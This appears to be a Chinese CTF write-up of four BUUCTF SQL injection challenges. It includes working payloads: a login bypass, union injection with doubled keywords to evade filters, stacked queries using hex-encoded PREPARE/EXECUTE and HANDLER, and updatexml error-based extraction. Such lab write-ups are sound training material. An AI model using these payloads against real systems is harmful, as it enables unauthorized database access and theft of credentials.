当前位置：首页 > news >正文

简单的sql注入 buuctf

news 2026/2/7 12:39:19

lovesql

这道题是一个非常简单的sql注入也就是万能密码我们只需要注意在输入用户名的地方使用 ’ 将语句提前终止并且or一个为真的条件这样整个语句的结果就为真这就是万能密码的原理

这样我们就得到了密码然后我们发现这只是密码

于是查看一下字段数尝试下注入

这里我们发现3 和4的回显不同就可以判断字段数为3

这里我们判断出来回显点位为2 和3 于是就可以在2和3处进行注入

这里我们发现数据库名为geek

接下来我们再进行爆表

这里我们报出来了两个字段我们查询一下第二个

爆出来了一串非常像flag的东西

flag{2fe797a0-2714-40fb-b270-bb096bbeb772}

[极客大挑战 2019]BabySQL

这里我先用万能密码发现进不去他前面告诉了我们他做了一些东西的过滤

看到这里的der 再联想到前面万能密码只剩下1=1 可以看出这里将我们的or给过滤掉了所以我们可以进行双写绕过

这里爆出了账户和密码我们在进行union联合注入

这里我们的联合注入依旧报错并且发现union 和select也被过滤了然后我们继续双写绕过

1' ununionion seselectlect 1,2,database()#

这里爆出了我们的数据库名geek

依然进行双写绕过来爆出表名

1'ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#

我们在来查询第一个字段里的列名

1' ununionion seselectlect 1,2,group_concat(column_name)frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

最后在查询里面字段的全部内容

1' ununionion seselectlect 1,2,group_concat(username ,id , passwoorrd) frfromom b4bsql#

就得到了想要的flag{1df5a48b-9f85-406f-a88f-e4279f49d469}

双写绕过

根据报错信息确认哪些关键词被过滤双写该关键词通过拼接字符防止被过滤如or被过滤则可双写为or

[强网杯 2019]随便注

这里我们发现union select都被过滤掉了我们推断这道题要使用堆叠注入并且我们发现这道题的闭合方式为单引号‘ 然后我们进行字段判断因为再3时回显发生变化这里我们就可以判断字段数为2

然后我们使用堆叠注入可以爆出数据库里的内容

1'; show databases;

再查看所有的数据表

1'; show tables;

然后我们在爆出数据表里的内容

1';show columns from 1919810931114514;#

我们在这里又得到了flag字段然后我们在查询flag字段里的内容因为这里的题目有过滤select所以这里我们可以利用编码来绕过select过滤

select *from where 1919810931114514``

编码过后就是1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

就得到了flag{bd214b2a-2740-4ce1-9275-4d5da99c4edc}

这里我们还可以使用handler代替select

1'; handler 1919810931114514open asa; handler a read next;#

这样我们依然可以得到flag

HANDLER的用法

打开表：HANDLER tablename OPEN [AS alias]

读取数据：HANDLER tablename READ indexname { = | < | > | <= | >= | LIKE } (value1,value2,...) [WHERE condition]

关闭表：HANDLER tablename CLOSE

HANDLER a read next 是读取下一行数据直到表的数据被读取完

[极客大挑战 2019]HardSQL

这里我们使用万能密码发现报错并且回显的内容无任何信息我们在这里重新构造一下万能密码

所以我们推断这道题要使用报错注入

extractvalue() 或者updatexml()

并且这里我们发现会过滤掉很多东西空格和/**/ 所以这里我们要使用^来形成异或来绕过

1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

这里爆出了我们的数据库名

1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#

这里又爆出了我们的表名

1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

这里爆出了我们的列名

1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#

这样就得到了一半的 flag{827f2d20-d5ea-4d06-a0

1'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))#

使用函数right()就得到了另一半flag 0-d5ea-4d06-a0a0-0dfab4de9002}

flag{827f2d20-d5ea-4d06-a0a0-0dfab4de9002}

简单的sql注入 buuctf

lovesql

[极客大挑战 2019]BabySQL

双写绕过

[强网杯 2019]随便注

HANDLER的用法

[极客大挑战 2019]HardSQL

相关文章：

简单的sql注入 buuctf

Ubuntu 24.04 LTS 空闲硬盘挂载到文件管理器的 other locations

＜电子幽灵＞开发笔记:BAT基础笔记(一）

PiliPalaX （第三方安卓哔哩哔哩）

在亚马逊云科技上高效蒸馏低成本、高精度的Llama 3.1 405B模型（上篇）

Amazon MSK 开启 Public 访问 SASL 配置的方法

LeetCode_438.找到字符串中所有字母异位词

一文读懂服务器的HBA卡

Debezium日常分享系列之：对于从Oracle数据库进行快照的性能优化

深度学习 Pytorch 基本优化思想与最小二乘法

C# 实现系统信息监控与获取全解析

Transformer详解：Attention机制原理

网络安全技术深度解析与实践案例

JavaScript中提高效率的技巧一

美食推荐系统协同过滤余弦函数推荐美食 Springboot Vue Element-UI前后端分离

ThinkPHP 8的一对多关联

Django简介与虚拟环境安装Django

Redis延迟队列详解

一文大白话讲清楚webpack基本使用——2——css相关loader的配置和使用

第二代增强-采购申请屏幕增强

uniapp 对接腾讯云IM群组成员管理（增删改查）

大数据学习栈记——Neo4j的安装与使用

在rocky linux 9.5上在线安装 docker

JDK 17 新特性

在鸿蒙HarmonyOS 5中使用DevEco Studio实现录音机应用

爬虫基础学习day2

【碎碎念】宝可梦 Mesh GO : 基于MESH网络的口袋妖怪宝可梦GO游戏自组网系统

[免费]微信小程序问卷调查系统(SpringBoot后端+Vue管理端)【论文+源码+SQL脚本】

JS手写代码篇----使用Promise封装AJAX请求

解析两阶段提交与三阶段提交的核心差异及MySQL实现方案